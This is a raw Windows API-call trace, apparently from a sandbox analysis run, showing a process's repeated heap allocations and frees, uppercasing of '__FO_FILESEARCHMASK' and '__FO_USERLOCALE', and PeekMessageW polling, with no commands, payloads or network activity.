[0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.441] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.441] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c70 [0251.442] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0251.442] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69c70 | out: hHeap=0xc60000) returned 1 [0251.442] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.442] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79388 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.442] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c70 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d00 [0251.442] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c98 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0251.442] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79250 [0251.443] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d10 [0251.443] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79250 | out: hHeap=0xc60000) returned 1 [0251.443] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d10 | out: hHeap=0xc60000) returned 1 [0251.443] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69cc0 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79250 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d10 [0251.443] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79250 | out: hHeap=0xc60000) returned 1 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ce8 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79250 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79238 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d20 [0251.443] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79238 | out: hHeap=0xc60000) returned 1 [0251.443] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d20 | out: hHeap=0xc60000) returned 1 [0251.443] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d10 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79238 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d20 [0251.443] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79238 | out: hHeap=0xc60000) returned 1 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d38 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79238 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793b8 [0251.443] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d30 [0251.443] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793b8 | out: hHeap=0xc60000) returned 1 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d30 | out: hHeap=0xc60000) returned 1 [0251.444] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d60 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793b8 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d30 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793b8 | out: hHeap=0xc60000) returned 1 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d88 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793b8 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793d0 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d40 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793d0 | out: hHeap=0xc60000) returned 1 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d40 | out: hHeap=0xc60000) returned 1 [0251.444] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69db0 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793d0 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d40 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793d0 | out: hHeap=0xc60000) returned 1 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793d0 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d50 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d60 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0251.444] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69dd8 [0251.444] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d60 [0251.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79400 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d60 [0251.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0251.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0251.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79400 | out: hHeap=0xc60000) returned 1 [0251.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69dd8 | out: hHeap=0xc60000) returned 1 [0251.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d50 | out: hHeap=0xc60000) returned 1 [0251.445] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69dd8 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79400 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d50 [0251.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79400 | out: hHeap=0xc60000) returned 1 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e00 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79400 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0251.445] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d60 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0251.446] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e28 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d60 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ed68 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79418 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d70 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79418 | out: hHeap=0xc60000) returned 1 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d70 | out: hHeap=0xc60000) returned 1 [0251.446] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e50 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79418 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d70 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79418 | out: hHeap=0xc60000) returned 1 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee48 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79418 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79430 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d80 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79430 | out: hHeap=0xc60000) returned 1 [0251.446] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d80 | out: hHeap=0xc60000) returned 1 [0251.446] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e78 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79430 [0251.446] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d80 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79430 | out: hHeap=0xc60000) returned 1 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee80 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79430 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d90 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ea0 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75da0 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75da0 | out: hHeap=0xc60000) returned 1 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79460 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75da0 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75da0 | out: hHeap=0xc60000) returned 1 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79460 | out: hHeap=0xc60000) returned 1 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69ea0 | out: hHeap=0xc60000) returned 1 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d90 | out: hHeap=0xc60000) returned 1 [0251.447] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ea0 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79460 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d90 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79460 | out: hHeap=0xc60000) returned 1 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ec8 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79460 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75da0 [0251.447] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0251.447] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ef0 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79490 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79478 | out: hHeap=0xc60000) returned 1 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79490 | out: hHeap=0xc60000) returned 1 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69ef0 | out: hHeap=0xc60000) returned 1 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75da0 | out: hHeap=0xc60000) returned 1 [0251.448] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ef0 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79490 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75da0 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79490 | out: hHeap=0xc60000) returned 1 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f18 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79490 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79478 | out: hHeap=0xc60000) returned 1 [0251.448] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0251.448] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f40 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0251.448] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75db0 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79478 | out: hHeap=0xc60000) returned 1 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f68 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75dc0 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75dc0 | out: hHeap=0xc60000) returned 1 [0251.449] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f90 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75dc0 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69fb8 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794a8 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75dd0 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794a8 | out: hHeap=0xc60000) returned 1 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75dd0 | out: hHeap=0xc60000) returned 1 [0251.449] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69fe0 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794a8 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75dd0 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794a8 | out: hHeap=0xc60000) returned 1 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a008 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794a8 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794c0 [0251.449] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75de0 [0251.449] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794c0 | out: hHeap=0xc60000) returned 1 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75de0 | out: hHeap=0xc60000) returned 1 [0251.450] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a030 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794c0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75de0 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794c0 | out: hHeap=0xc60000) returned 1 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7eeb8 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794c0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794d8 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75df0 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794d8 | out: hHeap=0xc60000) returned 1 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75df0 | out: hHeap=0xc60000) returned 1 [0251.450] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a058 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794d8 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75df0 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794d8 | out: hHeap=0xc60000) returned 1 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7eef0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794d8 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794f0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e00 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794f0 | out: hHeap=0xc60000) returned 1 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e00 | out: hHeap=0xc60000) returned 1 [0251.450] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a080 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794f0 [0251.450] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e00 [0251.450] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794f0 | out: hHeap=0xc60000) returned 1 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ef28 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794f0 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79508 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e10 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79508 | out: hHeap=0xc60000) returned 1 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e10 | out: hHeap=0xc60000) returned 1 [0251.451] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 